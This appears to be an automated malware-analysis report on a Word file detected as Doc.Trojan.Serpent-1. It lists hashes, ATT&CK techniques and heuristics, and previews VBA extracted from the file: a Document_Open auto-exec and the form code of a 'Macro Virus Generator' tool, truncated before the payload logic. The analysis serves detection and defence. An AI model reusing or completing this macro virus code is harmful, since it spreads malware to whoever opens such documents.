Office (OLE) malware analysis — malicious · bda221dfbdb65321

MALICIOUS

Office (OLE)

201.5 KB Created: 2000-07-17 17:04:00 Authoring application: Microsoft Word 9.0 First seen: 2012-06-14

MD5: 678c3c3587deaae71be6c64ac01724b6 SHA-1: fad2927926bb09158c35ff64cf5a59e58cdc7f54 SHA-256: bda221dfbdb6532167937e372faa8efe529d9972812cab5fe7e2a39d12eed667

220 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The sample contains a VBA macro that is automatically executed upon opening the document. This macro utilizes the Shell() function, a critical heuristic firing, indicating an attempt to execute arbitrary commands. The presence of the 'Doc.Trojan.Serpent-1' ClamAV detection further supports its malicious nature, likely as a downloader for a secondary stage.

Heuristics 5

ClamAV: Doc.Trojan.Serpent-1 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.Serpent-1
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 86395 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	86395 bytes
SHA-256: `56efd0356f18b76c07de6d134199af4f97ac7efcc2772d6be1bf117ebe1aa32f`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Private Sub Document_Open() On Error GoTo kraj Application.WindowState = wdWindowStateMinimize stform.Show kraj: End Sub Attribute VB_Name = "stform" Attribute VB_Base = "0{9D07C5A4-5BF6-11D4-9205-FDE1176FAF2D}{9D07C54F-5BF6-11D4-9205-FDE1176FAF2D}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Private Sub cm1_click() MsgBox "MVG v1.0 je u beta fazi. Nisam otkrio nikakve bug-ove, no ako ih otkrijes znaj da je ovo BETA verzija Macro Virus Generator-a. Uzivaj!", vbInformation, "MVG v1.0 - Doborodosli!" Unload stform glavna.Show End Sub Private Sub Image1_Click() MsgBox "hehehe...hehe...naci cete mozda neke skrivene opcije u ovoj alatki!", vbInformation, "MVG v1.0 - Tips!" End Sub Attribute VB_Name = "glavna" Attribute VB_Base = "0{9D07C5A7-5BF6-11D4-9205-FDE1176FAF2D}{9D07C557-5BF6-11D4-9205-FDE1176FAF2D}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False '============================================================== Public a, b, c, d, e, f, g, h, i, j, k, l, m, n, o, p, r, s, t '============================================================== Private Sub autor_Click() autorforma.Show End Sub Private Sub dani_Change() If dani.Text <> "" Then sec.Enabled = 1: tulzbris.Enabled = 1: insertbris.Enabled = 1 min.Enabled = 1: dani.Enabled = 1: brisvemen.Enabled = 1 selec.Enabled = 1: zaselec.Enabled = 1: printbes.Enabled = 1 odmahclose.Enabled = True End If End Sub Private Sub gret_Click() gretforma.Show End Sub Private Sub Image1_Click() Dim a As Integer a = 2 * (Rnd * 2 + 1) If a = 2 Then MsgBox "Kad sve izgleda da umire, ono se ustvari radja", vbInformation, "MVG v1.0 - poetry!" Else If a = 4 Then MsgBox "Neko skenira moju dusu...HEJ! averzu prestani sa skeniranjem!!", vbInformation, "MVG v1.0 - agony!" Else If a = 6 Then MsgBox "hmmm....this is strange..somehow I moved....", vbInformation, "MVG v1.0 - mist!" End If End If End If End Sub Private Sub Image2_Click() MsgBox "Visio.NoFrx.d is coming soon on ur 'puters! ....'till then, Stay tooned!", vbCritical, "MVG v1.0 - TIP!!!" End Sub Private Sub izlaz_Click() userexit.Show End Sub Private Sub kont_Click() kontakti.Show End Sub Private Sub min_Change() If min.Text <> "" Then sec.Enabled = 1: tulzbris.Enabled = 1: insertbris.Enabled = 1 min.Enabled = 1: dani.Enabled = 1: brisvemen.Enabled = 1 selec.Enabled = 1: zaselec.Enabled = 1: printbes.Enabled = 1 odmahclose.Enabled = True End If End Sub Private Sub mvginfo_Click() infomvg.Show End Sub Private Sub opcije2_Click() payforma.Show End Sub Private Sub sati_Change() If sati.Text <> "" Then sec.Enabled = 1: tulzbris.Enabled = 1: insertbris.Enabled = 1 min.Enabled = 1: dani.Enabled = 1: brisvemen.Enabled = 1 selec.Enabled = 1: zaselec.Enabled = 1: printbes.Enabled = 1 odmahclose.Enabled = True End If End Sub Private Sub sec_Change() If sec.Text <> "" Then sec.Enabled = 1: tulzbris.Enabled = 1: insertbris.Enabled = 1 min.Enabled = 1: dani.Enabled = 1: brisvemen.Enabled = 1 selec.Enabled = 1: zaselec.Enabled = 1: printbes.Enabled = 1 odmahclose.Enabled = True End If End Sub Private Sub selec_Click() If selec.Value = True Then With zaselec .Enabled = True .Locked = False End With Else With zaselec .Enabled = False End With End If End Sub Public Sub start_Click() '===[ varijable za time payload ]======================== a = sec.Text: b = min.Text: c = sati.Text: d = dani.Text '===[ varijable za HOOK infek ... (truncated)

SHA-256: 56efd0356f18b76c07de6d134199af4f97ac7efcc2772d6be1bf117ebe1aa32f

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Document_Open()
On Error GoTo kraj
Application.WindowState = wdWindowStateMinimize
stform.Show
kraj:
End Sub

Attribute VB_Name = "stform"
Attribute VB_Base = "0{9D07C5A4-5BF6-11D4-9205-FDE1176FAF2D}{9D07C54F-5BF6-11D4-9205-FDE1176FAF2D}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub cm1_click()
MsgBox "MVG v1.0 je u beta fazi. Nisam otkrio nikakve bug-ove, no ako ih otkrijes znaj da je ovo BETA verzija Macro Virus Generator-a. Uzivaj!", vbInformation, "MVG v1.0 - Doborodosli!"
Unload stform
glavna.Show
End Sub

Private Sub Image1_Click()
MsgBox "hehehe...hehe...naci cete mozda neke skrivene opcije u ovoj alatki!", vbInformation, "MVG v1.0 - Tips!"
End Sub

Attribute VB_Name = "glavna"
Attribute VB_Base = "0{9D07C5A7-5BF6-11D4-9205-FDE1176FAF2D}{9D07C557-5BF6-11D4-9205-FDE1176FAF2D}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
'==============================================================
Public a, b, c, d, e, f, g, h, i, j, k, l, m, n, o, p, r, s, t
'==============================================================

Private Sub autor_Click()
autorforma.Show
End Sub

Private Sub dani_Change()
If dani.Text <> "" Then
sec.Enabled = 1: tulzbris.Enabled = 1: insertbris.Enabled = 1
min.Enabled = 1: dani.Enabled = 1: brisvemen.Enabled = 1
selec.Enabled = 1: zaselec.Enabled = 1: printbes.Enabled = 1
odmahclose.Enabled = True
End If
End Sub

Private Sub gret_Click()
gretforma.Show
End Sub

Private Sub Image1_Click()
Dim a As Integer
a = 2 * (Rnd * 2 + 1)
If a = 2 Then
MsgBox "Kad sve izgleda da umire, ono se ustvari radja", vbInformation, "MVG v1.0 - poetry!"
Else
If a = 4 Then
MsgBox "Neko skenira moju dusu...HEJ! averzu prestani sa skeniranjem!!", vbInformation, "MVG v1.0 - agony!"
Else
If a = 6 Then
MsgBox "hmmm....this is strange..somehow I moved....", vbInformation, "MVG v1.0 - mist!"
End If
End If
End If
End Sub

Private Sub Image2_Click()
MsgBox "Visio.NoFrx.d is coming soon on ur 'puters!  ....'till then, Stay tooned!", vbCritical, "MVG v1.0 - TIP!!!"
End Sub

Private Sub izlaz_Click()
userexit.Show
End Sub

Private Sub kont_Click()
kontakti.Show
End Sub

Private Sub min_Change()
If min.Text <> "" Then
sec.Enabled = 1: tulzbris.Enabled = 1: insertbris.Enabled = 1
min.Enabled = 1: dani.Enabled = 1: brisvemen.Enabled = 1
selec.Enabled = 1: zaselec.Enabled = 1: printbes.Enabled = 1
odmahclose.Enabled = True
End If
End Sub

Private Sub mvginfo_Click()
infomvg.Show
End Sub

Private Sub opcije2_Click()
payforma.Show
End Sub

Private Sub sati_Change()
If sati.Text <> "" Then
sec.Enabled = 1: tulzbris.Enabled = 1: insertbris.Enabled = 1
min.Enabled = 1: dani.Enabled = 1: brisvemen.Enabled = 1
selec.Enabled = 1: zaselec.Enabled = 1: printbes.Enabled = 1
odmahclose.Enabled = True
End If

End Sub

Private Sub sec_Change()
If sec.Text <> "" Then
sec.Enabled = 1: tulzbris.Enabled = 1: insertbris.Enabled = 1
min.Enabled = 1: dani.Enabled = 1: brisvemen.Enabled = 1
selec.Enabled = 1: zaselec.Enabled = 1: printbes.Enabled = 1
odmahclose.Enabled = True
End If
End Sub

Private Sub selec_Click()
If selec.Value = True Then
With zaselec
.Enabled = True
.Locked = False
End With
Else
With zaselec
.Enabled = False
End With
End If
End Sub

Public Sub start_Click()
'===[ varijable za time payload ]========================
a = sec.Text: b = min.Text: c = sati.Text: d = dani.Text
'===[ varijable za HOOK infek
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.